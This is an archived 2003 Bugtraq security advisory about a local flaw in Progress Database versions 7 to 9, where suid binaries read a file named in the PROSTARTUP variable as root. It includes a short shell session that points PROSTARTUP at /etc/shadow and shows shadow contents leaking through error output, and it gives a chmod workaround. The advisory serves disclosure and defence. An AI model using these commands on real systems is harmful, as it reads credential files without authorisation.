[29628] in bugtraq
SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read
daemon@ATHENA.MIT.EDU (KF)
Thu Apr 3 17:49:53 2003
Message-ID: <3E8B1DB3.50504@snosoft.com>
Date: Wed, 02 Apr 2003 12:28:19 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: multipart/mixed;
boundary="------------010403030908010306040601"
--------------010403030908010306040601
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
This data can be found at http://www.secnetops.biz/research
-KF
--------------010403030908010306040601
Content-Type: text/plain;
name="SRT2003-04-02-1735.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="SRT2003-04-02-1735.txt"
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-04-02-1735
Product : Progress Database
Version : Versions 7 to 9
Vendor : progress.com
Class : local
Criticality : Medium to Low
Operating System(s) : Linux, SunOS, SCO, TRU64, *nix
High Level Explination
************************************************************************
High Level Description : Error messages can provide root owned data
What to do : chmod -s all suid binaries in /usr/dlc
Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed.
Low Level Description :
The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running thr program has the
permission to read the configuration file. A user can simply specify
a root owned file and cause an error message to be generated to view
the file contents. Most versions beyond v6 appear to be affected.
An example variable that can be abused is the PROSTARTUP variable.
bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)
bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs
bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)
Luckily on the machine I chose to exploit the line that was read from the
shadow file did not have an encrypted hash. This however is not always
the case.
Patch or Workaround : chmod -s all suid binaries in the $DLC folder
Vendor Status : vendor has been notified and is working on a fix
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
--------------010403030908010306040601--
